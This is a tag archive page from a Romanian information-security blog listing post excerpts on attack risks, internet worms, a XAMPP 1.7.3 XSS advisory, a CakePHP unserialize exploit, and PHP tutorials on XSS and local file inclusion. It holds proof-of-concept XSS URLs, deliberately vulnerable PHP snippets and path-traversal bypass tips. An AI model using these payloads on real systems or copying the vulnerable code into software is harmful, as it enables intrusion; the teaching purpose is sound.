Arhive Taguri: vulnerabilitati
Riscurile de atac asupra securitatii sistemelor informationale - Securitatea Informatica

Riscurile de atac asupra securitatii sistemelor informationale

În mai puţin de generaţie, introducerea calculatoarelor, virtual, în fiecare dimensiune a societăţii a schimbat semnificativ modul în care oamenii şi organizaţiile obţin sau diseminează informaţii ori desfăşoară afaceri, permiţând mai mare eficienţă, un control operaţional sporit şi un acces rapid la informaţii. Alături de multe beneficii, însă, calculatoarele şi interconectarea acestora prezintă şi aspecte [...]

Citeşte mai mult
Securitatea IT si viermii internet - Securitatea Informatica

Securitatea IT si viermii internet

Internet este o structura deschisa, la care se poate conecta un numar mare de calculatoare fiind deci greu de controlat. De aceea putem vorbi de vulnerabilitatea retelelor manifestata pe variate planuri. Un aspect crucial al retelelor de calculatoare, în special al comunicatiilor prin Internet îl constituie securitatea informatiilor. Categorii de atacuri asupra retelelor Amenintarile la [...]

Citeşte mai mult
Vulnerabilitate XAMPP 1.7.3 – XSS - Securitatea Informatica

Vulnerabilitate XAMPP 1.7.3 – XSS

Data: 11/06/2010 Exploit: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script>

Citeşte mai mult
Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8 - Securitatea Informatica

Vulnerabilitate CakePHP <= 1.3.5 / 1.2.8

Data: 20 noiembrie 2010 Descriere: Acest cod exploateaza o vulnerabilitate unserialize() in componenta de securitate a CakePHP. Mai multe detalii aici. Acest exploit functioneaza impotriva oricarei aplicatii dezvoltate pe framework-ul CakePHP care foloseste form-uri POST cu token-uri de securitate si foloseste configuratia Cache default (file-system caching). Este posibila exploatarea si pentru alte tipuri de cache [...]

Citeşte mai mult
Vulnerabilitati PHP – Cross-Site Scripting - Securitatea Informatica

Vulnerabilitati PHP – Cross-Site Scripting

Sfaturi : Puteţi folosii o mulţime de vectori, puteţi încerca o grămadă de metode de a trece peste protecţii, îi puteţi găsii pe internet. Exemplu de bază Cod:. <?php $name=$_GET['name']; print $name; ?> Inputul nu este filtrat, un atacator poate injecta cod JavaScript. Exemplu: http://127.0.0.1/test.php?name=<script>alert(”XSS”)</script> Un popup cu mesajul XSS va fi afişat. Codul JavaScript a [...]

Citeşte mai mult
Vulnerabilitati PHP –  Local File Inclusion - Securitatea Informatica

Vulnerabilitati PHP – Local File Inclusion

Sfaturi : Puteţi folosi trucul cu NULLBYTE şi ? ../ înseamnă un director înapoi Pe serverele Windows puteţi folosi “..\” în loc de “../”. “..\” va devenii “..%5C” (urlencoded). Aceleaşi funcţii care îţi permit să incluzi (include, include_once, require, require_once). Exemplu de bază Cod: <?php $pagina=$_GET['pagina']; include ’/pages/’.$pagina; ?> Acum, nu putem să includem scriptul nostru [...]

Citeşte mai mult
Pagina 1 din 512345
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro